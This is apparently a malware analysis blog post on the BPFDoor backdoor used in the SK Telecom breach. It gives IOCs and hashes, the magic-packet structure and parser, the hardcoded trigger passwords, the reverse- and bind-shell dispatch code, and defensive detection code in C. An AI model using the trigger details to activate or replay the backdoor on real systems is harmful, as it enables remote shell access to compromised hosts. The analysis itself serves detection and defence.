MAL-250608-01-01

| Metadata | Information |
|---|---|
| Report ID | MAL-250608-01-01 |
| Incident Date | 2022-06-15 to 2025-04-22 |
| Report Date | 2025-06-08 |
| Malware Name | BPFDoor |
| Version | 01 |
| Analyst | @therustymate |
| Organization | Private |
| Severity | Critical |
| Status | Public/Draft |
| Malware Type | RAT |
| Detection Date | 2025-04-18 06:09 PM |
| Affected Systems | Linux/HSS |
| CVE | N/A |
| Tags | Backdoor, ISP Hacking |

Incident Report

In the recent SK Telecom (SKT) cyberattack, the threat actors gained initial access from the external network through a web shell, moved laterally into the internal network, and deployed the BPFDoor backdoor on Linux-based HSS (Home Subscriber Server) systems. Approximately 9.8 GB of sensitive subscriber data (e.g. IMSI values) was exfiltrated during the intrusion.

Incident Metadata

| Metadata | Information |
|---|---|
| Command & Control (C2) Server | 165.232.174[.]130 |
| Indicators of Compromise | 165.232.174[.]130 |
| Infection Vector | Web shell |
| Persistence Mechanisms | BPF filter attached to a raw socket (SO_ATTACH_FILTER), so the backdoor receives its trigger packets without opening a listening port; raw-socket custom packet trigger mechanism |
| Payload Description | Backdoor |
| Network Behavior | Custom packet communication |

File Names

| File Name | Size |
|---|---|
| dbus-srv | 34 KB |
| inode262394 | 28 KB |
| dbus-srv | 34 KB |
| dbus-srv | 34 KB |
| dbus-srv | 34 KB |
| File_in_Inode_#1900667 | 28 KB |
| gm | 2,063 KB |
| rad | 22 KB |

Hashes

| File Name | MD5 | SHA-1 | SHA-256 |
|---|---|---|---|
| hpasmmld | a47d96ffe446a431a46a3ea3d1ab4d6e | e6ccf59c2b7f6bd0f143cde356f60d2217120ad2 | c7f693f7f85b01a8c0e561bd369845f40bff423b0743c7aa0f4c323d9133b5d4 |
| smartadm | 227fa46cf2a4517aa1870a011c79eb54 | 466527d15744cdbb6e1d71129e1798acbe95764d | 3f6f108db37d18519f47c5e4182e5e33cc795564f286ae770aa03372133d15c4 |
| hald-addon-volume | f4ae0f1204e25a17b2adbbab838097bd | e3399ea3ebbbd47c588ae807c4bd429f6eef8deb | 95fd8a70c4b18a9a669fec6eb82dac0ba6a9236ac42a5ecde270330b66f51595 |
| dbus-srv-bin.txt | 714165b06a462c9ed3d145bc56054566 | 2ca9a29b139b7b2993cabf025b34ead957dee08b | aa779e83ff5271d3f2d270eaed16751a109eb722fca61465d86317e03bbf49e4 |
| dbus-srv | 3c54d788de1bf6bd2e7bc7af39270540 | 67a3a1f8338262cd9c948c6e55a22e7d9070ca6c | 925ec4e617adc81d6fcee60876f6b878e0313a11f25526179716a90c3b743173 |
| inode262394 | fbe4d008a79f09c2d46b0bcb1ba926b3 | 0f12ab32bac3f4db543f702d58368f20b6f5d324 | 29564c19a15b06dd5be2a73d7543288f5b4e9e6668bbd5e48d3093fb6ddf1fdb |
| dbus-srv | c2415a464ce17d54b01fc91805f68967 | 4b6824ed764822dc422384cec89d45bbc682ef09 | be7d952d37812b7482c1d770433a499372fde7254981ce2e8e974a67f6a088b5 |
| dbus-srv | aba893ffb1179b2a0530fe4f0daf94da | 213dbb5862a19a423e5b10789a07ee163ab71969 | 027b1fed1b8213b86d8faebf51879ccc9b1afec7176e31354fbac695e8daf416 |
| dbus-srv | e2c2f1a1fbd66b4973c0373200130676 | 7e7234c5e94a92dd8f43632aca1ac60db7d96d56 | a2ea82b3f5be30916c4a00a7759aa6ec1ae6ddadc4d82b3481640d8f6a325d59 |
| File_in_Inode_#1900667 | dc3361ce344917da20f1b8cb4ae0b31d | c2717777ba2cb9a698889fca884eb7650144f32e | e04586672874685b019e9120fcd1509d68af6f9bc513e739575fc73edefd511d |
| gm | a778d7ad5a23a177f2d348a0ae4099772c09671e | c2717777ba2cb9a698889fca884eb7650144f32e | adfdd11d69f4e971c87ca5b2073682d90118c0b3a3a9f5fbbda872ab1fb335c6 |
| rad | 0bcd4f14e7d8a3dc908b5c17183269a4 | b631d5ed10d0b2c7d9c39f43402cccde7f3cb5ea | 7c39f3c3120e35b8ab89181f191f01e2556ca558475a2803cb1f02c05c830423 |

Note: the MD5 value listed for gm is 40 hex digits (SHA-1 length, not MD5), and its SHA-1 is identical to that of File_in_Inode_#1900667; treat those two values as unverified until they are re-checked against the sample.

References

CAUTION: Some references may not be fully reliable.

  • KISA (boho.or.kr)
  • Namu Wiki (namu.wiki)
  • korea.kr

Analysis

Function/Symbol Table

| Function | Hex Location | Description |
|---|---|---|
| xchg() | Unknown | Swap two bytes in memory (RC4 key-scheduling helper) |
| rc4_init() | Unknown | Initialize the RC4 state from the key |
| rc4() | Unknown | RC4 encrypt/decrypt a buffer |
| cwrite() | Unknown | Encrypting writer (RC4) for the shell channel |
| cread() | Unknown | Decrypting reader (RC4) for the shell channel |
| remove_pid() | Unknown | Unlink (delete) the pid_path file |
| setup_time() | Unknown | Set file timestamps to a fixed value (1225394236 seconds since the epoch) so the dropped file does not stand out |
| terminate() | Unknown | Process termination handler |
| on_terminate() | Unknown | SIGTERM (process termination) handler |
| init_signal() | Unknown | Install the termination signal handlers |
| sig_child() | Unknown | SIGCHLD handler (reap terminated child processes) |
| ptym_open() | Unknown | Open a pseudo-terminal master |
| ptys_open() | Unknown | Open the matching pseudo-terminal slave |
| open_tty() | Unknown | Create the TTY used by the interactive shell |
| try_link() | Unknown | Connect a TCP client socket to the C2 (reverse shell transport) |
| mon() | Unknown | Connect to the given IP/port and send "1" back (check-in) |
| set_proc_name() | Unknown | Overwrite the process name through the prctl syscall |
| to_open() | Unknown | Check the access permission for the shell |
| logon() | Unknown | Password verification; returns the command selector used by the dispatcher |
| packet_loop() | Unknown | Raw-socket sniffer loop: parses TCP, UDP and ICMP packets and handles the magic packet |
| b() | Unknown | Bind a TCP listening socket on the first free port in 42391-43390 |
| w() | Unknown | Accept connections |
| getshell() | Unknown | Adjust the host firewall (iptables) and spawn the bind shell server |
| shell() | Unknown | Core command handler (interactive shell over the socket) |
| main() | Unknown | Entry point; holds the configuration |

Magic Packet

The following C structure is the magic packet that activates BPFDoor. It is 24 bytes, packed, and sits directly after the transport header of the trigger packet.

```c
struct magic_packet {
    unsigned int   flag;
    in_addr_t      ip;
    unsigned short port;
    char           pass[14];
} __attribute__ ((packed));
```

| Field | Field Type | Length | Description |
|---|---|---|---|
| flag | unsigned int | 4 bytes | Not used by the command handler |
| ip | in_addr_t | 4 bytes | C2 server IPv4 address (callback target for the reverse shell) |
| port | unsigned short | 2 bytes | C2 server port number |
| pass | char[14] | 14 bytes | Password/command |

The following C code locates the magic packet inside frames read from the raw socket, for TCP, UDP and ICMP. The trigger can therefore arrive over any of the three protocols, and no port has to be open on the victim: the packets are read from a raw socket rather than a listening socket, which is why a port scan alone will not reveal an idle BPFDoor.

```c
switch (ip->ip_p) {
case IPPROTO_TCP:
    // +14 skips the Ethernet header; size_ip comes from the IP header length field
    tcp = (struct sniff_tcp *)(buff + 14 + size_ip);
    size_tcp = TH_OFF(tcp) * 4;                 // TCP data offset, so TCP options are honoured
    mp = (struct magic_packet *)(buff + 14 + size_ip + size_tcp);
    break;
case IPPROTO_UDP:
    // (ip+1) assumes a 20-byte IP header (no options); magic packet follows the 8-byte UDP header
    udp = (struct sniff_udp *)(ip + 1);
    mp = (struct magic_packet *)(udp + 1);
    break;
case IPPROTO_ICMP:
    // same 20-byte IP header assumption; +8 skips the ICMP echo header (type, code, checksum, id, seq)
    pbuff = (char *)(ip + 1);
    mp = (struct magic_packet *)(pbuff + 8);
    break;
default:
    break;
}
```

Two details matter for anyone writing a detector or a trigger-replay tool: the magic packet must start immediately after the transport header (after TCP options, if any), and the UDP and ICMP branches only work for packets without IP options, since they hard-code a 20-byte IP header.
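The offset arithmetic above is easy to get wrong when building a detector, so the following is an added example (not BPFDoor's code, and not from the original report) that applies the same three-protocol parsing to an Ethernet frame, but takes the IP header length from the IHL nibble so frames with IP options are handled, and refuses frames that are too short to hold a 24-byte magic packet at the computed offset. The frame builder and the 192.0.2.10 callback address are constructed test data; the function and macro names are this example's own.

```c
#include <arpa/inet.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ETH_HDR   14          /* Ethernet header, the "+14" in BPFDoor's parser */
#define MAGIC_LEN 24          /* sizeof(struct magic_packet): 4 + 4 + 2 + 14 */

struct magic_packet {
    uint32_t flag;
    uint32_t ip;              /* in_addr_t, network byte order */
    uint16_t port;            /* network byte order */
    char     pass[14];
} __attribute__((packed));

/* Locate the magic packet in an Ethernet/IPv4 frame.
 * Returns the IP protocol number (6 TCP, 17 UDP, 1 ICMP) and copies the
 * candidate into *out, or -1 if the frame is not IPv4, carries another
 * protocol, or is too short to hold a magic packet at the computed offset.
 * Unlike the malware's UDP/ICMP branches, the IP header length is read
 * from the IHL nibble, so packets carrying IP options are parsed correctly. */
int find_magic(const unsigned char *frame, size_t len, struct magic_packet *out)
{
    if (len < ETH_HDR + 20) return -1;
    const unsigned char *ip = frame + ETH_HDR;
    if ((ip[0] >> 4) != 4) return -1;                 /* not IPv4 */
    size_t ip_hlen = (size_t)(ip[0] & 0x0f) * 4;      /* IHL, honours options */
    if (ip_hlen < 20 || ETH_HDR + ip_hlen > len) return -1;
    uint8_t proto = ip[9];
    const unsigned char *l4 = ip + ip_hlen;
    size_t l4_hlen;
    switch (proto) {
    case 6:   /* TCP: data-offset nibble, the same value as TH_OFF(tcp)*4 */
        if (ETH_HDR + ip_hlen + 20 > len) return -1;
        l4_hlen = (size_t)(l4[12] >> 4) * 4;
        if (l4_hlen < 20) return -1;
        break;
    case 17:  /* UDP: fixed 8-byte header */
    case 1:   /* ICMP: 8-byte echo header, the "pbuff+8" in the original */
        l4_hlen = 8;
        break;
    default:
        return -1;
    }
    if (ETH_HDR + ip_hlen + l4_hlen + MAGIC_LEN > len) return -1;
    memcpy(out, l4 + l4_hlen, MAGIC_LEN);
    return proto;
}

/* Copy the 14-byte password field into a NUL-terminated buffer (15 bytes). */
void magic_pass(const struct magic_packet *mp, char out[15])
{
    memcpy(out, mp->pass, 14);
    out[14] = '\0';
}

/* Build a constructed test frame (no checksums; the parser does not check them).
 * l4_hlen lets a TCP test carry options, e.g. 32 = 20 bytes + 12 bytes of options. */
size_t build_frame(unsigned char *buf, uint8_t proto, size_t l4_hlen,
                   const char *pass, uint16_t port)
{
    size_t total = ETH_HDR + 20 + l4_hlen + MAGIC_LEN;
    memset(buf, 0, total);
    buf[12] = 0x08; buf[13] = 0x00;                   /* EtherType IPv4 */
    unsigned char *ip = buf + ETH_HDR;
    ip[0] = 0x45;                                     /* IPv4, IHL 5 (20 bytes) */
    ip[9] = proto;
    unsigned char *l4 = ip + 20;
    if (proto == 6) l4[12] = (uint8_t)((l4_hlen / 4) << 4);  /* TCP data offset */
    struct magic_packet mp;
    memset(&mp, 0, sizeof mp);
    mp.ip   = inet_addr("192.0.2.10");                /* RFC 5737 test address (constructed) */
    mp.port = htons(port);
    strncpy(mp.pass, pass, sizeof mp.pass);
    memcpy(l4 + l4_hlen, &mp, MAGIC_LEN);
    return total;
}

int main(void)
{
    unsigned char frame[128];
    struct magic_packet mp;
    char pass[15];
    size_t n = build_frame(frame, 6, 32, "justforfun", 4444);  /* TCP trigger with options */
    if (find_magic(frame, n, &mp) == 6) {
        magic_pass(&mp, pass);
        printf("TCP trigger: pass=%s callback port=%u\n", pass, ntohs(mp.port));
    }
    return 0;
}
```

Pointed at a pcap or a raw-socket capture, find_magic() is the piece that decides whether a frame is a candidate trigger; the password string it yields is what the dispatcher in the next section switches on.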

Login Password

The passwords accepted by the malware are stored as plain byte arrays in the binary and are:

  • justforfun
  • socket

```c
{0x6a, 0x75, 0x73, 0x74, 0x66, 0x6f, 0x72, 0x66, 0x75, 0x6e, 0x00}; // justforfun
{0x73, 0x6f, 0x63, 0x6b, 0x65, 0x74, 0x00};                         // socket
```

```python
# Decode the byte arrays above; strip the trailing NUL before printing
data = [0x6a, 0x75, 0x73, 0x74, 0x66, 0x6f, 0x72, 0x66, 0x75, 0x6e, 0x00]
print(bytes(data).rstrip(b"\x00").decode())
# >>> justforfun
data2 = [0x73, 0x6f, 0x63, 0x6b, 0x65, 0x74, 0x00]
print(bytes(data2).rstrip(b"\x00").decode())
# >>> socket
```

If the transmitted value is "justforfun", the malware opens a TCP reverse shell back to the C2 address and port carried in the magic packet.

  • try_link() returns a connected TCP client socket, which is stored in the variable scli.

  • scli is then passed to the shell() function.

If the transmitted value is "socket", the malware sets up a bind shell server and waits for an incoming connection.

  • getshell() calls b(), which returns a TCP listening socket (bind server).

  • The resulting socket is stored in the variable sockfd, which is then passed to the shell() function.

In summary, the command structure of this malware is:

  • justforfun command → spawns a reverse shell
  • socket command → spawns a bind shell

```c
cmp = logon(mp->pass);                    // verify the password field and select the command
switch (cmp) {
case 1:                                   // "socket": bind shell
    strcpy(sip, inet_ntoa(ip->ip_src));   // source address of the trigger packet
    getshell(sip, ntohs(tcp->th_dport));  // and the destination port it was sent to
    break;
case 0:                                   // "justforfun": reverse shell
    scli = try_link(bip, mp->port);       // bip/mp->port: C2 address and port from the magic packet
    if (scli > 0)
        shell(scli, NULL, NULL);
    break;
case 2:
    mon(bip, mp->port);                   // check-in only, no shell
    break;
}
```

Note that the bind-shell path keys the firewall handling on the trigger packet's source IP, so the operator's address appears on the wire twice: once as the trigger source and again as the client that connects to the bind port.

Port Range

When spawning a bind shell, the malware does not pick a random port. b() tries to bind every port from 42391 upward and listens on the first one that succeeds, so the bind shell normally lands on 42391 unless that port is already in use; the range is 42391 to 43390.

```c
for (port = 42391; port < 43391; port++) {   // 42391 - 43390, ascending; first free port wins
    my_addr.sin_port = htons(port);
    if (bind(sock_fd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) {
        continue;                              // port taken, try the next one
    }
    if (listen(sock_fd, 1) == 0) {
        *p = port;                             // report the chosen port to the caller
        return sock_fd;
    }
    close(sock_fd);                            // after this, bind() on the closed fd fails and the loop returns -1
}
return -1;
```
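Because the listener is only present while a bind shell is active, the cheapest host check is a pass over the kernel's TCP table for LISTEN sockets in 42391-43390. The following is an added example (not from the report or the malware) that parses /proc/net/tcp lines in the format the kernel emits and reports any listener in that range; the sample table embedded below is constructed, not a real capture, and the function names are this example's own.

```c
#include <stdio.h>
#include <string.h>

#define PORT_LO    42391
#define PORT_HI    43390
#define TCP_LISTEN 0x0A      /* state code used in /proc/net/tcp */

/* Parse one /proc/net/tcp line. Returns the local port if the socket is in
 * LISTEN state and the port falls inside BPFDoor's bind-shell range, else 0.
 * Addresses in that file are hex "ip:port", e.g. 00000000:A597 (= 0.0.0.0:42391). */
int suspicious_listener(const char *line)
{
    unsigned lip, lport, rip, rport, st;
    if (sscanf(line, " %*d: %8x:%4x %8x:%4x %2x", &lip, &lport, &rip, &rport, &st) != 5)
        return 0;                                   /* header line or malformed */
    if (st != TCP_LISTEN) return 0;
    if (lport < PORT_LO || lport > PORT_HI) return 0;
    return (int)lport;
}

/* Scan a whole /proc/net/tcp text. Stores up to max hits in ports[]; returns the count. */
int scan_tcp_table(const char *text, int *ports, int max)
{
    int n = 0;
    const char *p = text;
    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char line[256];
        if (len >= sizeof line) len = sizeof line - 1;   /* lines are ~150 chars; truncate defensively */
        memcpy(line, p, len);
        line[len] = '\0';
        int port = suspicious_listener(line);
        if (port && n < max) ports[n++] = port;
        p = nl ? nl + 1 : p + len;
    }
    return n;
}

/* Read the live table on the host. Returns the hit count, or -1 if the file cannot be read. */
int scan_live(int *ports, int max)
{
    static char buf[1 << 16];
    FILE *f = fopen("/proc/net/tcp", "r");
    if (!f) return -1;
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    buf[n] = '\0';
    fclose(f);
    return scan_tcp_table(buf, ports, max);
}

/* Constructed sample (not a real capture): the header, sshd listening on 22,
 * a listener on 42391 (0xA597), and an ESTABLISHED connection on 42400 (0xA5A0)
 * that must not be reported. */
static const char sample_tcp[] =
"  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
"   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0\n"
"   1: 00000000:A597 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 23456 1 0000000000000000 100 0 0 10 0\n"
"   2: 0100007F:A5A0 0100007F:C000 01 00000000:00000000 00:00000000 00000000     0        0 34567 1 0000000000000000 20 4 30 10 -1\n";

int main(void)
{
    int ports[16];
    int n = scan_tcp_table(sample_tcp, ports, 16);
    for (int i = 0; i < n; i++)
        printf("sample: listener on port %d is inside the BPFDoor bind-shell range\n", ports[i]);
    n = scan_live(ports, 16);
    for (int i = 0; i < n; i++)
        printf("live: listener on port %d is inside the BPFDoor bind-shell range\n", ports[i]);
    return 0;
}
```

This check is deliberately independent of process names, since set_proc_name() rewrites the backdoor's name to look like a system daemon; a hit should be followed by mapping the socket inode from the same line to its owning process. It finds an active bind shell only, so it complements rather than replaces looking for processes holding raw sockets with a BPF filter attached.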
Source: https://fuwari.vercel.app/posts/mal-250608-01-01/
Author: The Rusty
Published: 2025-06-08
License: CC BY-NC-SA 4.0